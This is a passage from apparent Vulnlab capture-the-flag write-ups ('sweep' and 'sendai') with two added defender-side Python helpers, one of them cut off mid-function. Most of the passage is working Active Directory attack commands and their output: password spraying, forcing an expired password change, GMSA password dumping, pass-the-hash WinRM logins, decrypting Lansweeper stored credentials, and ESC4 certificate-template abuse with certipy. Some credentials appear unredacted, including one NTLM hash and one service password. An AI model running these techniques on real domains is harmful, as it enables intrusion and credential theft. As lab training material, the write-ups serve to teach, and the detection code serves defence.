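     "TargetUserName": "Lansweeper Admins",
     "MemberName": "CN=svc_inventory_lnx,CN=Users,DC=sweep,DC=vl"},
    {"EventID": 4728, "SubjectDomainName": "SWEEP",
     "SubjectUserName": "Administrator",
     "TargetUserName": "Domain Users",
     "MemberName": "CN=intern,CN=Users,DC=sweep,DC=vl"},
    {"EventID": 4732, "SubjectDomainName": "SWEEP",
     "SubjectUserName": "Administrator",
     "TargetUserName": "Administrators",
     "MemberName": "CN=hmar648,CN=Users,DC=sweep,DC=vl"},
    {"EventID": 4624, "SubjectUserName": "intern"},
]


def member_cn(member_dn):
    """MemberName is a distinguished name; the leading CN is the account."""
    m = re.match(r"CN=([^,]+)", member_dn, re.IGNORECASE)
    return m.group(1) if m else member_dn


def alerts(events):
    """Return one alert per group-add event that hits a watched group or is a
    self-add; TargetUserName holds the group, SubjectUserName the actor."""
    out = []
    for ev in events:
        if ev.get("EventID") not in GROUP_ADD_EVENTS:
            continue
        group, actor = ev["TargetUserName"], ev["SubjectUserName"]
        member = member_cn(ev["MemberName"])
        reasons = []
        if group.lower() in WATCHED_GROUPS:
            reasons.append("watched group")
        if member.lower() == actor.lower():
            reasons.append("self-add")
        if reasons:
            out.append({"group": group, "member": member, "actor": actor,
                        "scope": GROUP_ADD_EVENTS[ev["EventID"]],
                        "reasons": reasons})
    return out


if __name__ == "__main__":
    for a in alerts(SAMPLE_EVENTS):
        print(f"[!] {a['actor']} added {a['member']} to {a['scope']} group "
              f"'{a['group']}' ({', '.join(a['reasons'])})")
```

The self-add reason fires regardless of the group, which catches abuse of write rights on groups nobody thought to watch; the underlying fix is to remove GenericAll/WriteProperty on the group from the service account, which is what the BloodHound edge points at.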

Then WinRM to the box

┌──(puck㉿kali)-[~/vulnlab/sweep]
evil-winrm -i sweep.vl -u 'svc_inventory_lnx' -p '0|5<REDACTED>'

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\temp> upload LansweeperDecrypt.ps1
                                        
Info: Uploading /home/puck/vulnlab/sweep/LansweeperDecrypt.ps1 to C:\temp\LansweeperDecrypt.ps1
                                        
Data: 5700 bytes of 5700 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> ./LansweeperDecrypt.ps1
[+] Loading web.config file...
[+] Found protected connectionStrings section. Decrypting...
[+] Decrypted connectionStrings section:
<connectionStrings>
    <add name="lansweeper" connectionString="Data Source=(localdb)\.\LSInstance;Initial Catalog=lansweeperdb;Integrated Security=False;User ID=lansweeperuser;Password=Uk<REDACTED>;Connect Timeout=10;Application Name=&quot;LsService Core .Net SqlClient Data Provider&quot;" providerName="System.Data.SqlClient" />
</connectionStrings>
[+] Opening connection to the database...
[+] Retrieving credentials from the database...
[+] Decrypting password for user: SNMP Community String
[+] Decrypting password for user:
[+] Decrypting password for user: SWEEP\svc_inventory_win
[+] Decrypting password for user: svc_inventory_lnx
[+] Credentials retrieved and decrypted successfully:

CredName          Username                Password
--------          --------                --------
SNMP-Private      SNMP Community String   private
Global SNMP                               public
Inventory Windows SWEEP\svc_inventory_win 4^5<REDACTED>
Inventory Linux   svc_inventory_lnx       0|5<REDACTED>

Then WinRM to the box as admin

┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ evil-winrm -i sweep.vl -u 'SWEEP\svc_inventory_win' -p '4^5<REDACTED>'

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_inventory_win\Documents>


vulnlab-sendai

vulnlab sendai

a medium Windows machine

Enum

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u 'puck' -p '' --users --shares 
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\puck: 
SMB         dc.sendai.vl    445    DC               [+] Enumerated shares
SMB         dc.sendai.vl    445    DC               Share           Permissions     Remark
SMB         dc.sendai.vl    445    DC               -----           -----------     ------
SMB         dc.sendai.vl    445    DC               ADMIN$                          Remote Admin
SMB         dc.sendai.vl    445    DC               C$                              Default share
SMB         dc.sendai.vl    445    DC               config                          
SMB         dc.sendai.vl    445    DC               IPC$            READ            Remote IPC
SMB         dc.sendai.vl    445    DC               NETLOGON                        Logon server share 
SMB         dc.sendai.vl    445    DC               sendai          READ            company share
SMB         dc.sendai.vl    445    DC               SYSVOL                          Logon server share 
SMB         dc.sendai.vl    445    DC               Users           READ            
SMB         dc.sendai.vl    445    DC               [-] Error enumerating domain users using dc ip dc.sendai.vl: NTLM needs domain\username and a password
SMB         dc.sendai.vl    445    DC               [*] Trying with SAMRPC protocol

RID brute-force

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u 'puck' -p '' --rid-brute 10000
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\puck: 
SMB         dc.sendai.vl    445    DC               [+] Brute forcing RIDs
SMB         dc.sendai.vl    445    DC               498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               500: SENDAI\Administrator (SidTypeUser)
SMB         dc.sendai.vl    445    DC               501: SENDAI\Guest (SidTypeUser)
SMB         dc.sendai.vl    445    DC               502: SENDAI\krbtgt (SidTypeUser)
SMB         dc.sendai.vl    445    DC               512: SENDAI\Domain Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               513: SENDAI\Domain Users (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               514: SENDAI\Domain Guests (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               515: SENDAI\Domain Computers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               516: SENDAI\Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               517: SENDAI\Cert Publishers (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               518: SENDAI\Schema Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               525: SENDAI\Protected Users (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               526: SENDAI\Key Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1000: SENDAI\DC$ (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1104: SENDAI\sqlsvc (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1105: SENDAI\websvc (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1107: SENDAI\staff (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1112: SENDAI\Susan.Harper (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1117: SENDAI\Jason.Brady (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1128: SENDAI\ca-operators (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1129: SENDAI\admsvc (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1131: SENDAI\support (SidTypeGroup)

cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt

Check for accounts flagged password-must-change (null-password spray)

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u users.txt -p '' --continue-on-success
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Administrator: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Guest: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\krbtgt: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Cert: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Schema: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Enterprise: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Group: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Read-only: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Cloneable: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Protected: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Key: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Enterprise: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\RAS: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Allowed: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Denied: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\DC$: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\DnsAdmins: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\DnsUpdateProxy: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\SQLServer2005SQLBrowserUser$DC: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\sqlsvc: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\websvc: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\staff: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Dorothy.Jones: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Kerry.Robinson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Naomi.Gardner: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Anthony.Smith: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Susan.Harper: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Stephen.Simpson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Marie.Gallagher: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Kathleen.Kelly: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Norman.Baxter: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Jason.Brady: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Malcolm.Smith: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Lisa.Williams: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Ross.Sullivan: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Clifford.Davey: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Declan.Jenkins: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Lawrence.Grant: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Leslie.Johnson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Megan.Edwards: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\ca-operators: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\admsvc: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\mgtsvc$: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\support: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\: 
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

.

Change the expired SMB password (the account was flagged STATUS_PASSWORD_MUST_CHANGE)

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$  impacket-smbpasswd -newpass Passw0rd@ 'Elliot.Yates':@sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================

Current SMB password: 
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

Enumerating some more

┌──(puck㉿kali)-[~/vulnhub/sendai]
└─$ impacket-smbclient sendai.vl/'Elliot.Yates':'Passw0rd@'sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
config
IPC$
NETLOGON
sendai
SYSVOL
Users
# use config
# ls
drw-rw-rw-          0  Thu Jun 13 13:22:52 2024 .
drw-rw-rw-          0  Wed Jul 19 10:11:25 2023 ..
-rw-rw-rw-         78  Tue Jul 11 08:57:10 2023 .sqlconfig
# get .sqlconfig

---
┌──(puck㉿kali)-[~/vulnhlab/sendai]
└─$ cat .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=Su<REDACTED>85;
---

┌──(puck㉿kali)-[~/vulnhub/sendai]
└─$ bloodhound-python -u sqlsvc -p Su<REDACTED>85 -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.69.199  
INFO: Found AD domain: sendai.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.sendai.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.sendai.vl
INFO: Found 27 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.sendai.vl
INFO: Done in 00M 09S

Load the collected data into BloodHound

We have GenericAll on ADMSVC$, and ADMSVC@sendai.vl can read the GMSA password of mgtsvc$

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ net rpc group addmem "ADMSVC" Elliot.Yates -U sendai.vl/Elliot.Yates -S sendai.vl
Password for [SENDAI.VL\Elliot.Yates]:Passw0rd@
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec ldap sendai.vl -u Elliot.Yates -p Passw0rd@ --gmsa
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        dc.sendai.vl    636    DC               [+] sendai.vl\Elliot.Yates:Passw0rd@ 
LDAP        dc.sendai.vl    636    DC               [*] Getting GMSA Passwords
LDAP        dc.sendai.vl    636    DC               Account: mgtsvc$              NTLM: 57<REDACTED>11
                                                                                   

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec winrm sendai.vl -u 'mgtsvc$' -H 57ae3a74ca9345ae52fadc29f178ad11

SMB         dc.sendai.vl    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
HTTP        dc.sendai.vl    5985   DC               [*] http://dc.sendai.vl:5985/wsman
WINRM       dc.sendai.vl    5985   DC               [+] sendai.vl\mgtsvc$:57<REDACTED>11 (Pwn3d!)

Evil-WinRM into the box and run PrivescCheck.ps1

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H 57<REDACTED>11 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> 
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cat c:\user.txt
VL{e01<REDACTED>62}

*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> mkdir c:\temp


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         6/14/2024   1:04 AM                temp


*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> upload PrivescCheck.ps1
                                        
Info: Uploading /home/puck/vulnlab/sendai/PrivescCheck.ps1 to C:\temp\PrivescCheck.ps1
                                        
Data: 394496 bytes of 394496 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> 
*Evil-WinRM* PS C:\temp>  . .\PrivescCheck.ps1; Invoke-PrivescCheck
+------+------------------------------------------------+------+
| TEST | USER > Privileges                              | VULN |
+------+------------------------------------------------+------+
| DESC | List the privileges that are associated to the        |
|      | current user's token. If any of them can be leveraged |
|      | to somehow run code in the context of the SYSTEM      |
|      | account, it will be reported as a finding.            |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | USER > Environment Variables                   | INFO |
+------+------------------------------------------------+------+
| DESC | List the environment variables of the current process |
|      | and try to identify any potentially sensitive         |
|      | information such as passwords or API secrets. This    |
|      | check is simply based on keyword matching and might   |
|      | not be entirely reliable.                             |
+------+-------------------------------------------------------+
[!] Nothing found.

+------+------------------------------------------------+------+
| TEST | SERVICES > Non-default Services                | INFO |
+------+------------------------------------------------+------+
| DESC | List all registered services and filter out the ones  |
|      | that are built into Windows. It does so by parsing    |
|      | the target executable's metadata.                     |
+------+-------------------------------------------------------+
[*] Found 13 result(s).


Name        : Amazon EC2Launch
DisplayName : Amazon EC2Launch
ImagePath   : "C:\Program Files\Amazon\EC2Launch\service\EC2LaunchService.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : AmazonSSMAgent
DisplayName : Amazon SSM Agent
ImagePath   : "C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : AWSLiteAgent
DisplayName : AWS Lite Guest Agent
ImagePath   : "C:\Program Files\Amazon\XenTools\LiteAgent.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : MSSQL$SQLEXPRESS
DisplayName : SQL Server (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
User        : SENDAI\sqlsvc
StartMode   : Automatic

Name        : SQLAgent$SQLEXPRESS
DisplayName : SQL Server Agent (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE" -i SQLEXPRESS
User        : NT AUTHORITY\NETWORKSERVICE
StartMode   : Disabled

Name        : SQLBrowser
DisplayName : SQL Server Browser
ImagePath   : "C:\Program Files (x86)\Microsoft SQL Server\90\Shared\sqlbrowser.exe"
User        : NT AUTHORITY\LOCALSERVICE
StartMode   : Disabled

Name        : SQLTELEMETRY$SQLEXPRESS
DisplayName : SQL Server CEIP service (SQLEXPRESS)
ImagePath   : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlceip.exe" -Service SQLEXPRESS
User        : NT Service\SQLTELEMETRY$SQLEXPRESS
StartMode   : Automatic

Name        : SQLWriter
DisplayName : SQL Server VSS Writer
ImagePath   : "C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : ssh-agent
DisplayName : OpenSSH Authentication Agent
ImagePath   : C:\Windows\System32\OpenSSH\ssh-agent.exe
User        : LocalSystem
StartMode   : Disabled

Name        : Support
DisplayName :
ImagePath   : C:\WINDOWS\helpdesk.exe -u clifford.davey -p RFmoB2WplgE_3p -k netsvcs
User        : LocalSystem
StartMode   : Automatic

Name        : VGAuthService
DisplayName : VMware Alias Manager and Ticket Service
ImagePath   : "C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"
User        : LocalSystem
StartMode   : Automatic

Name        : vm3dservice
DisplayName : @oem8.inf,%VM3DSERVICE_DISPLAYNAME%;VMware SVGA Helper Service
ImagePath   : C:\Windows\system32\vm3dservice.exe
User        : LocalSystem
StartMode   : Automatic

Name        : VMTools
DisplayName : VMware Tools
ImagePath   : "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"
User        : LocalSystem
StartMode   : Automatic




+------+------------------------------------------------+------+
| TEST | SERVICES > Permissions - SCM                   | VULN |
+------+------------------------------------------------+------+
| DESC | Interact with the Service Control Manager (SCM) and   |
|      | check whether the current user can modify any         |
|      | registered service.                                   |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | SERVICES > Permissions - Registry              | VULN |
+------+------------------------------------------------+------+
| DESC | Parse the registry and check whether the current user |
|      | can modify the configuration of any registered        |
|      | service.                                              |
+------+-------------------------------------------------------+
[!] Not vulnerable.

+------+------------------------------------------------+------+
| TEST | SERVICES > Binary Permissions                  | VULN |
+------+------------------------------------------------+------+
| DESC | List all services and check whether the current user  |
|      | can modify the target executable or write files in    |
|      | its parent folder.                                    |
+------+-------------------------------------------------------+

.

ADCS Enum with Certipy-ad

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec ldap sendai.vl -u Elliot.Yates -p 'Passw0rd@' -M ADCS
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        dc.sendai.vl    389    DC               [+] sendai.vl\Elliot.Yates:Passw0rd@ 
ADCS                                                Found PKI Enrollment Server: dc.sendai.vl
ADCS                                                Found CN: sendai-DC-CA
ADCS                                                Found PKI Enrollment WebService: https://dc.sendai.vl/sendai-DC-CA_CES_Kerberos/service.svc/CES
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad find -u 'clifford.davey' -p 'RF<REDACTED>3p' -dc-ip 10.10.69.199 -dns-tcp -ns 10.10.69.199 -debug   
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Authenticating to LDAP server
[+] Bound to ldaps://10.10.69.199:636 - ssl
[+] Default path: DC=sendai,DC=vl
[+] Configuration path: CN=Configuration,DC=sendai,DC=vl
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[+] Trying to resolve 'dc.sendai.vl' at '10.10.69.199'
[*] Trying to get CA configuration for 'sendai-DC-CA' via CSRA
[+] Trying to get DCOM connection for: 10.10.69.199
[!] Got error while trying to get CA configuration for 'sendai-DC-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'sendai-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[+] Connected to remote registry at 'dc.sendai.vl' (10.10.69.199)
[*] Got CA configuration for 'sendai-DC-CA'
[+] Resolved 'dc.sendai.vl' from cache: 10.10.69.199
[+] Connecting to 10.10.69.199:80
[*] Saved BloodHound data to '20240614041344_Certipy.zip'. Drag and drop the file into the BloodHound GUI from @ly4k
[+] Adding Domain Computers to list of current user's SIDs
[*] Saved text output to '20240614041344_Certipy.txt'
[*] Saved JSON output to '20240614041344_Certipy.json'
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

Findings

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614041344_Certipy.json | grep ESC
        "ESC4": "'SENDAI.VL\\\\ca-operators' has dangerous permissions"

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614041344_Certipy.json | grep SendaiComputer
      "Template Name": "SendaiComputer",
      "Display Name": "SendaiComputer",

Abuse the template

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad template -username clifford.davey@sendai.vl -password RF<REDACTED>3p -template SendaiComputer -save-old -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

Run certipy-ad again

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ certipy-ad template -username clifford.davey@sendai.vl -password RF<REDACTED>3p  -template SendaiComputer -save-old -dc-ip 10.10.69.199      
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
                                                                                              
Running certipy-ad find again, we now see:

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ cat 20240614042650_Certipy.json | grep ESC
        "ESC1": "'SENDAI.VL\\\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication",
        "ESC2": "'SENDAI.VL\\\\Authenticated Users' can enroll and template can be used for any purpose",
        "ESC3": "'SENDAI.VL\\\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set",
        "ESC4": "'SENDAI.VL\\\\Authenticated Users' has dangerous permissions"
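
The grep above only shows the raw finding strings. As an added example (not part of the original writeup or of Certipy), this Python walks two Certipy JSON exports and reports, per template, which ESC codes are new or changed between runs, which is how a defender would spot a template that was modified via ESC4; the sample data is constructed from the findings shown above, and the "[!] Vulnerabilities" key name is an assumption the walker does not rely on.

```python
import json
import re
from typing import Any, Dict, Set

# Certipy finding keys look like "ESC1", "ESC4", ... (as in the grep output above).
ESC_KEY = re.compile(r"^ESC\d+$")


def esc_findings(data: Any) -> Dict[str, Dict[str, str]]:
    """Collect ESCn findings per certificate template from Certipy's JSON.

    Only two structural facts are relied on: a template is a dict carrying a
    "Template Name", and its findings are string values under keys matching
    ESC\\d+ somewhere below that dict. The surrounding layout is not assumed.
    """
    found: Dict[str, Dict[str, str]] = {}

    def collect_esc(node: Any, out: Dict[str, str]) -> None:
        if isinstance(node, dict):
            for key, value in node.items():
                if ESC_KEY.match(str(key)) and isinstance(value, str):
                    out[key] = value
                else:
                    collect_esc(value, out)
        elif isinstance(node, list):
            for item in node:
                collect_esc(item, out)

    def walk(node: Any) -> None:
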